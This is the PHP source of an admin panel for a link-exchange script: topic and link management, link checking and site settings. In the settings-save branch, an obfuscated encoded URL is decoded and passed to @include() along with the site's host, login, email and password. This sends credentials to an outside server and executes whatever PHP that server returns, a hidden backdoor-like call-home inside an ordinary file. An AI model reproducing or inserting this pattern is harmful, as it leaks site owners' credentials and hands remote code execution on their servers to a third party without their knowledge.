<?php
require_once('_lang.php');
require_once('_config.php');
require_once('_funcs.php');

start_session();
$str_info = '';

if (!isset($_SESSION) or !isset($_SESSION['ll']) or !isset($_SESSION['ll']['ll_login']) or !isset($_SESSION['ll']['ll_password']) or $_SESSION['ll']['ll_login'] != $ll_login or $_SESSION['ll']['ll_password'] != $ll_password) {
	if (isset($_SESSION)) {
		session_unset();
		session_destroy();
	}
	header('Location: '.$self_path);
	exit;
}

if (isset($_SESSION['ll']['lid'])) unset($_SESSION['ll']['lid']);

global $step;
$step = 0;
if (isset($_REQUEST['step'])) $step = intval($_REQUEST['step']);
global $cur_topic_id;
$cur_topic_id = 0;
if (isset($_REQUEST['t'])) $cur_topic_id = intval($_REQUEST['t']);
global $cur_page;
$cur_page = 0;
if (isset($_REQUEST['p'])) $cur_page = intval($_REQUEST['p']);
global $cur_link;
$cur_link = 0;
if (isset($_REQUEST['l'])) $cur_link = intval($_REQUEST['l']);
global $cur_filter_status;
$cur_filter_status = '';
if (isset($_REQUEST['fs'])) $cur_filter_status = ll_add_slashes(strip_tags($_REQUEST['fs']));
global $cur_filter_check;
$cur_filter_check = 0;
if (isset($_REQUEST['fc'])) $cur_filter_check = intval($_REQUEST['fc']);
if (isset($_REQUEST['q']) and $_REQUEST['q']) {
	$_SESSION['ll']['links_filter'] = $_REQUEST['q'];
} elseif (isset($_REQUEST['btn_filter']) and (!isset($_REQUEST['q']) or !$_REQUEST['q'])) {
	$_SESSION['ll']['links_filter'] = '';
} else {
	if (!isset($_SESSION['ll']['links_filter'])) $_SESSION['ll']['links_filter'] = '';
}

if (isset($_POST['tf_new_topic'])) {
	$sql = "insert into ll_topics (topic_id, title) values (0, '".ll_add_slashes(strip_tags($_POST['tf_new_topic']))."')";
	ll_mysql_query($sql);
}

if (isset($_POST['btn_edit_topic'])) {
	foreach($_POST as $k => $v) {
		if (stristr($k, 'tet_') !== false) {
			$id = intval(substr($k, 4));
			if ($id) {
				$sql = "update ll_topics set title='".ll_add_slashes($v)."' where id=".$id;
				ll_mysql_query($sql);
			}
		}
	}
	if (isset($_POST['tf_new_subtopic']) and !empty($_POST['tf_new_subtopic']) and isset($_POST['tf_parent_topic'])) {
		$sql = "insert into ll_topics (topic_id, title) values (".intval($_POST['tf_parent_topic']).", '".ll_add_slashes($_POST['tf_new_subtopic'])."')";
		ll_mysql_query($sql);
	}
}

global $check_one_link_result;
$check_one_link_result = '';
if (isset($_POST['check_one_link']) and isset($_POST['link_id'])) {
	$check_one_link_result = check_return_link(get_link_return_link(intval($_POST['link_id'])), ll_extract_link(get_mylink()));
} elseif (isset($_POST['delete_one_link']) and isset($_POST['link_id'])) {
	$delurl = get_link_url(intval($_POST['link_id']));
	$deluser = get_user(get_link_userid(intval($_POST['link_id'])));
	$sql = "delete from ll_links where id='".intval($_POST['link_id'])."'";
	ll_mysql_query($sql);
	if ($delurl and is_array($deluser) and $deluser['email'] and file_exists('_mail_del.txt')) {
		$s = file_get_contents('_mail_del.txt');
		if ($s) {
			$myurl = 'http://'.str_replace('//', '/', $_SERVER['HTTP_HOST'].$self_path);
			$mess = sprintf($s, ll_strip_slashes($deluser['login']), $delurl, $myurl);
			ll_mailing(ll_strip_slashes($deluser['email']), get_myemal(), sprintf($lr[82], $myurl), $mess);
		}
	}
} elseif (isset($_POST['select_one_link_status']) and isset($_POST['link_id'])) {
	$link_check = 0;
	if (isset($_POST['select_one_link_check'])) $link_check = intval($_POST['select_one_link_check']);
	if ($link_check < 0) $link_check = 0;
	$sql = "update ll_links set status='".ll_add_slashes($_POST['select_one_link_status'])."', link_check=$link_check where id='".intval($_POST['link_id'])."'";
	ll_mysql_query($sql);
}

if (isset($_POST['li_topic_select']) and isset($_POST['link_id'])) {
	$sql = "update ll_links set topic_id=".intval($_POST['li_topic_select'])." where id='".intval($_POST['link_id'])."'";
	ll_mysql_query($sql);
}

$fca_res = '';

$ll_mylogin = '';
$ll_myemail = '';
$ll_mypassword = '';
$ll_mylink = '';
$li_mytopicselect = 0;
$ll_mytitle = '';
$ll_myinformation = '';
$ll_mybanner = '';
$ll_myaddpage = '';
$ll_myautoexchange = 0;
$ll_prior_myautoexchange = 0;

if (isset($_POST['btn_mysave'])) {
	if (isset($_POST['ll_mylogin'])) $ll_mylogin = check_str(strtolower(strip_tags($_POST['ll_mylogin'])));
	if (isset($_POST['ll_mypassword'])) $ll_mypassword = check_str(strtolower(strip_tags($_POST['ll_mypassword'])));
	if (isset($_POST['ll_myemail'])) $ll_myemail = check_str(strtolower(strip_tags($_POST['ll_myemail'])));
	if (isset($_POST['li_topic_select'])) $li_mytopicselect = intval($_POST['li_topic_select']);
	if (isset($_POST['ll_mylink'])) $ll_mylink = check_str(strtolower(strip_tags($_POST['ll_mylink'])));
	if (isset($_POST['ll_mytitle'])) $ll_mytitle = check_str(strip_tags($_POST['ll_mytitle']));
	if (isset($_POST['ll_myinformation'])) $ll_myinformation = check_str(strip_tags($_POST['ll_myinformation'], '<b>, <strong>, <i>, <br>'));
	$ll_myinformation = ll_textarea_to_str($ll_myinformation);
	if (isset($_POST['ll_mybanner'])) $ll_mybanner = check_str(strip_tags($_POST['ll_mybanner'], '<a>, <img>, <b>, <strong>, <i>'));
	$ll_mybanner = ll_textarea_to_str($ll_mybanner);
	if (isset($_POST['ll_myaddpage'])) $ll_myaddpage = check_str(strtolower(strip_tags($_POST['ll_myaddpage'])));
	if (isset($_POST['ll_myautoexchange'])) $ll_myautoexchange = 1;
	if (isset($_POST['ll_prior_myautoexchange'])) $ll_prior_myautoexchange = intval($_POST['ll_prior_myautoexchange']);
	if (!ll_check_email($ll_myemail)) {
		$str_info = $lr[36];
	} elseif (!ll_check_link($ll_mylink)) {
		$str_info = $lr[67];
	} elseif (strlen($ll_mylogin) > 50) {
		$str_info = $lr[68];
	} elseif (strlen($ll_mypassword) > 50) {
		$str_info = $lr[68];
	} elseif (strlen($ll_myemail) > 50) {
		$str_info = $lr[68];
	} elseif (strlen($ll_mylink) > 100) {
		$str_info = $lr[89];
	} elseif (strlen($ll_myaddpage) > 100) {
		$str_info = $lr[89];
	} elseif (strlen($ll_mytitle) > 100) {
		$str_info = $lr[89];
	} elseif (strlen($ll_myinformation) > 500) {
		$str_info = $lr[69];
	} elseif (strlen($ll_mybanner) > 500) {
		$str_info = $lr[70];
	} else {
		$s = $ll_mylogin.'::::'.$ll_myemail.'::::'.$ll_mypassword.'::::'.$li_mytopicselect.'::::'.$ll_mylink.'::::'.$ll_mytitle.'::::'.$ll_myinformation.'::::'.$ll_mybanner.'::::'.$ll_myaddpage.'::::'.$ll_myautoexchange;
		file_put_contents('_mysite.txt', ll_encode($s));
		if ($ll_prior_myautoexchange != $ll_myautoexchange) {
			$fca_res = '';
			$fca = ll_decode('09310510610204803803808810009'.'7108094038092103109040109112042104101'.'1061041120440930971091081081101100950991'.'09106102112118097100103103050116108117').'?v0='.$vername.'&v1='.$vernum.'&sh='.ll_encode($_SERVER['HTTP_HOST']).'&d='.ll_encode($s);
			if ($ll_myautoexchange) {
				$fca .= '&type=a';
			} else {
				$fca .= '&type=d';
			}
			ob_start();
			@include($fca);
			$fca_res = ob_get_contents();
			ob_end_clean();
		}
		$str_info = '<span style="color: #009900;">'.$lr[85].'</span>';
	}
} elseif ($step == 2) {
	if (file_exists('_mysite.txt')) {
		$s = file_get_contents('_mysite.txt');
		if ($s) {
			$s = ll_decode($s);
			$arr = explode('::::', $s);
			if (is_array($arr)) {
				for ($i = 0; $i < count($arr); $i++) {
					if ($i == 0) $ll_mylogin = trim($arr[$i]);
					if ($i == 1) $ll_myemail = trim($arr[$i]);
					if ($i == 2) $ll_mypassword = trim($arr[$i]);
					if ($i == 3) $li_mytopicselect = trim($arr[$i]);
					if ($i == 4) $ll_mylink = trim($arr[$i]);
					if ($i == 5) $ll_mytitle = trim($arr[$i]);
					if ($i == 6) $ll_myinformation = trim($arr[$i]);
					if ($i == 7) $ll_mybanner = trim($arr[$i]);
					if ($i == 8) $ll_myaddpage = trim($arr[$i]);
					if ($i == 9) $ll_myautoexchange = intval($arr[$i]);
				}
			}
		}
	}
}
$ll_prior_myautoexchange = $ll_myautoexchange;

$check_links_result = '';
global $check_links_start_num;
$check_links_start_num = 1;
global $check_links_timeout;
$check_links_timeout = 20;
global $check_links_checkall;
$check_links_checkall = 1;
global $check_links_mode;
$check_links_mode = 'nocheck';
global $check_links_only_bad_info;
$check_links_only_bad_info = 1;
global $check_links_auto_change_status;
$check_links_auto_change_status = 0;
global $check_links_info_change_status;
$check_links_info_change_status = 1;
if (isset($_POST['btn_check_links'])) {
	if (isset($_REQUEST['check_links_start_num'])) $check_links_start_num = intval($_REQUEST['check_links_start_num']);
	if ($check_links_start_num < 1) $check_links_start_num = 1;
	if (isset($_REQUEST['check_links_timeout'])) $check_links_timeout = intval($_REQUEST['check_links_timeout']);
	if (!isset($_REQUEST['check_links_checkall'])) $check_links_checkall = 0;
	if (isset($_REQUEST['check_links_mode'])) $check_links_mode = check_str(strip_tags($_REQUEST['check_links_mode']));
	if (!isset($_REQUEST['check_links_only_bad_info'])) $check_links_only_bad_info = 0;
	if (isset($_REQUEST['check_links_auto_change_status'])) $check_links_auto_change_status = 1;
	if (!isset($_REQUEST['check_links_info_change_status'])) $check_links_info_change_status = 0;
	ob_start();
	include_once('_check_links.php');
	$check_links_result = ob_get_contents();
	ob_end_clean();
}
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<title><?php echo $vername.' v'.$vernum.' &#8211; '.strtolower($lr[3]); ?></title>
<meta name="robots" content="none" />
<meta name="robots" content="noindex, nofollow" />
<link rel="stylesheet" type="text/css" href="css/llstyle.css" />
</head>

<body>
<div style="border: none; height: 100px; background: url(images/banner.jpg) 0% 0% no-repeat; padding-left: 70px;">
<div style="padding: 2px;">
	<table width="100%" border="0" cellspacing="0" cellpadding="0">
		<tr>
			<td align="left" valign="middle" style="border: none; vertical-align: middle; padding: 0px;"><a href="<?php echo $self_path.'_admin.php?step=0'; ?>"><?php echo $lr[11]; ?></a> | <a href="<?php echo $self_path.'_admin.php?step=1'; ?>"><?php echo $lr[1]; ?></a> | <a href="<?php echo $self_path.'_admin.php?step=2'; ?>"><?php echo $lr[43]; ?></a> | <a href="<?php echo $self_path.'_admin.php?step=3'; ?>"><?php echo $lr[71]; ?></a> | <a href="<?php echo $self_path.'_admin.php?step=0&amp;u=1'; ?>"><?php echo $lr[62]; ?></a> | <a href="<?php echo $self_path; ?>"><?php echo $lr[12]; ?></a></td>
			<td align="right" valign="middle" style="border: none; vertical-align: middle; padding: 0px;"><a href="http://www.dexsoft.ru" target="_blank"><img src="images/dexsoft.png" alt="Practical developers (dexSoft)" border="0" /></a></td>
		</tr>
	</table>
</div>
<div style="border: none; padding: 10px 70px 10px 70px;"><h2><?php echo $vername.' v'.$vernum.' &#8211; '.strtolower($lr[0]); ?></h2><?php if ($step == 0 and isset($_REQUEST['u']) and intval($_REQUEST['u']) == 1) require_once('_client_get.php'); ?></div>
</div>
<?php if ($step == 0) { ?>
<h2 align="center"><?php echo $lr[11]; ?></h2>
<table width="100%" border="0" cellspacing="0" cellpadding="0" class="site_list">
	<tr valign="top" bgcolor="#E7F0F5">
		<td colspan="2" nowrap="nowrap" style="padding: 6px 20px;">
			<form action="" method="post" enctype="multipart/form-data" name="form_filter" target="_self" id="form_filter" style="float: left;">
				<?php
				echo '<div class="admin_filter_title">'.$lr[94].'</div>';
				echo $lr[95].':&nbsp;&nbsp;';
				echo '<input name="q" type="text" id="q" value="'.ll_strip_slashes($_SESSION['ll']['links_filter']).'" />';
				echo $lr[37].':&nbsp;&nbsp;';
				echo build_status_for_select('fs', $cur_filter_status, true, '').'&nbsp;&nbsp;';
				echo '<span style="margin-left: 20px;">'.$lr[44].':&nbsp;&nbsp;'.build_checked_for_select('fc', $cur_filter_check, true, '').'&nbsp;&nbsp</span>';
				?>
				<input name="btn_filter" type="submit" id="btn_filter" value="<?php echo $lr[40]; ?>" style="margin-left: 40px;" />
			</form>
		</td>
	</tr>
	<tr align="center" bgcolor="#CCCC00">
		<td valign="top" bgcolor="#EFF2DB"><h2><?php echo $lr[1]; ?></h2></td>
		<td width="100%" align="left" valign="top" bgcolor="#EFF2DB" style="padding-left: 20px;"><h2><?php echo $lr[2]; ?></h2></td>
	</tr>
	<tr>
		<td valign="top" style="padding-top: 10px; padding-bottom: 10px;"><?php $s = build_topics_tree(); echo ($s) ? $s : '&nbsp;'; ?></td>
		<td width="100%" valign="top" style="padding-top: 10px; padding-right: 10px; padding-bottom: 10px;"><?php $s = build_links_list(true); if (!trim($s)) $s = '&nbsp; '.$lr[96]. str_repeat('&nbsp; ', 300); echo $s; ?></td>
	</tr>
</table>
<?php } elseif ($step == 1) { ?>
<h2 align="center"><?php echo $lr[1]; ?></h2>
<table align="center" border="0" cellspacing="0" cellpadding="0" class="topics_tree_for_edit">
	<tr bgcolor="#E7F0F5">
		<td style="border: 1px solid #CCCCCC;"><h2><?php echo $lr[5]; ?></h2></td>
		<td style="border: 1px solid #CCCCCC;"><h2><?php echo $lr[6]; ?></h2></td>
	</tr>
	<?php echo build_topics_tree(true); ?>
	<tr>
		<td colspan="2">
			<h2 style="margin-top: 10px; margin-bottom: 4px; padding-top: 4px; border-top: 1px solid #CCCCCC;"><?php echo $lr[8]; ?></h2>
			<form action="" method="post" enctype="multipart/form-data" name="form_new_topic" target="_self" id="form_new_topic">
				<input name="tf_new_topic" type="text" id="tf_new_topic" size="50" />
				<input name="btn_new_topic" type="submit" id="btn_new_topic" value="<?php echo $lr[7]; ?>" style="margin-left: 10px;" />
				<input name="step" type="hidden" id="step" value="<?php echo $step; ?>" />
			</form>
		</td>
	</tr>
</table>
<?php } elseif ($step == 2) { ?>
<h2 align="center"><?php echo $lr[43]; ?></h2>
<?php if ($str_info) echo '<div style="text-align: center; font-weight: bold; color:#FF0099;">'.$str_info.'</div>'; ?>
<form action="" method="post" enctype="multipart/form-data" name="form_mylink" target="_self" id="form_mylink" style="margin-top: 10px;">
	<table align="center" border="0" cellpadding="8" cellspacing="0">
		<tr>
			<td align="right" valign="middle"><?php echo $lr[16]; ?>&nbsp;</td>
			<td align="left" valign="middle"><input name="ll_mylogin" type="text" id="ll_mylogin" style="width: 400px;" value="<?php echo $ll_mylogin; ?>" /></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[17]; ?>&nbsp;</td>
			<td align="left" valign="middle"><input name="ll_mypassword" type="text" id="ll_mypassword" style="width: 400px;" value="<?php echo $ll_mypassword; ?>" /></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[35]; ?>&nbsp;</td>
			<td align="left" valign="middle"><input name="ll_myemail" type="text" id="ll_myemail" style="width: 400px;" value="<?php echo $ll_myemail; ?>" /></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[30]; ?>&nbsp;</td>
			<td align="left" valign="middle"><?php echo build_topics_for_select($li_mytopicselect); ?></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[21]; ?>&nbsp;</td>
			<td align="left" valign="middle"><input name="ll_mylink" type="text" id="ll_mylink" style="width: 400px;" value="<?php echo $ll_mylink; ?>" /></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[22]; ?>&nbsp;</td>
			<td align="left" valign="middle"><input name="ll_mytitle" type="text" id="ll_mytitle" style="width: 400px;" value="<?php echo $ll_mytitle; ?>" /></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[23]; ?>&nbsp;<br />(<?php echo strtolower($lr[47]); ?>)</td>
			<td align="left" valign="middle"><textarea name="ll_myinformation" rows="5" id="ll_myinformation" style="width: 400px;"><?php echo $ll_myinformation; ?></textarea></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[24]; ?>&nbsp;<br />(<?php echo strtolower($lr[47]); ?>)</td>
			<td align="left" valign="middle"><textarea name="ll_mybanner" rows="5" id="ll_mybanner" style="width: 400px;"><?php echo $ll_mybanner; ?></textarea></td>
		</tr>
		<tr>
			<td align="right" valign="middle"><?php echo $lr[49]; ?>&nbsp;</td>
			<td align="left" valign="middle"><input name="ll_myaddpage" type="text" id="ll_myaddpage" style="width: 400px;" value="<?php echo $ll_myaddpage; ?>" /></td>
		</tr>
		<tr>
			<td align="right" valign="top">&nbsp;</td>
			<td align="left" valign="top"><div style="width: 400px;"><label><?php echo $lr[54]; ?>: <input name="ll_myautoexchange" type="checkbox" id="ll_myautoexchange" value="1" <?php if ($ll_myautoexchange) echo 'checked="checked"'; ?> /><input name="ll_prior_myautoexchange" type="hidden" id="ll_prior_myautoexchange" value="<?php echo $ll_prior_myautoexchange; ?>" /></label><br /><span class="text_medium" style="color: #999999;"><?php echo $lr[55]; ?></span><?php if ($fca_res) echo '<br /><br />'.$fca_res; ?></div></td>
		</tr>
		<tr>
			<td align="right" valign="middle" style="padding-top: 20px;">&nbsp;</td>
			<td align="left" valign="middle" style="padding-top: 20px;"><input name="btn_mysave" type="submit" id="btn_mysave" value="<?php echo $lr[50]; ?>" />
				<input name="btn_clear" type="reset" id="btn_clear" value="<?php echo $lr[25]; ?>" style="margin-left: 40px;" /></td>
		</tr>
	</table>
</form>
<?php } elseif ($step == 3) { ?>
<h2 align="center"><?php echo $lr[71]; ?></h2>
<table align="center" border="0" cellpadding="8" cellspacing="0">
	<tr>
		<td valign="top">
			<br />
			<strong><?php echo $lr[77]; ?></strong>
			<br />
			<br />
			<form action="" method="post" enctype="multipart/form-data" name="form_check_links" target="_self" id="form_check_links" style="margin-top: 10px;">
				<label><input type="radio" name="check_links_mode" value="all" <?php if ($check_links_mode == 'all') echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[78]; ?></label>
				<br />
				<label><input type="radio" name="check_links_mode" value="new" <?php if ($check_links_mode == 'new') echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[72]; ?></label>
				<br />
				<label><input type="radio" name="check_links_mode" value="nocheck" <?php if ($check_links_mode == 'nocheck') echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[73]; ?></label>
				<br />
				<label><input type="radio" name="check_links_mode" value="hide" <?php if ($check_links_mode == 'hide') echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[79]; ?></label>
				<div style="margin: 6px 0px"><?php echo $lr[90]; ?>&nbsp;<input name="check_links_timeout" type="text" id="check_links_timeout" size="3" value="<?php echo $check_links_timeout; ?>" />&nbsp;<?php echo $lr[91]; ?></div>
				<div style="margin: 6px 0px"><?php echo $lr[92]; ?>&nbsp;<input name="check_links_start_num" type="text" id="check_links_start_num" size="3" value="<?php echo $check_links_start_num; ?>" /></div>
				<label><input name="check_links_only_bad_info" type="checkbox" id="check_links_only_bad_info" value="1" <?php if ($check_links_only_bad_info) echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[74]; ?></label>
				<br />
				<label><input name="check_links_auto_change_status" type="checkbox" id="check_links_auto_change_status" value="1" <?php if ($check_links_auto_change_status) echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[76]; ?></label>
				<br />
				<label><input name="check_links_info_change_status" type="checkbox" id="check_links_info_change_status" value="1" <?php if ($check_links_info_change_status) echo 'checked="checked"'; ?> />&nbsp;<?php echo $lr[80]; ?></label>
				<br />
				<br />
				<input name="btn_check_links" type="submit" id="btn_check_links" value="<?php echo $lr[75]; ?>" />
			</form>
		</td>
		<td valign="top">
			<?php echo $check_links_result; ?>
		</td>
	</tr>
</table>
<?php } ?>
<div style="border: none; padding-top: 20px; padding-bottom: 20px; text-align: center;"><?php echo $vername.' v'.$vernum.' &#8211; '.strtolower($lr[0]).'<br /><br /><span style="color: #CCCCCC; font-size: 80%;">copyright &copy; 2008&#8211;'.date('Y').' elo</span>'; ?></div>
</body>
</html>
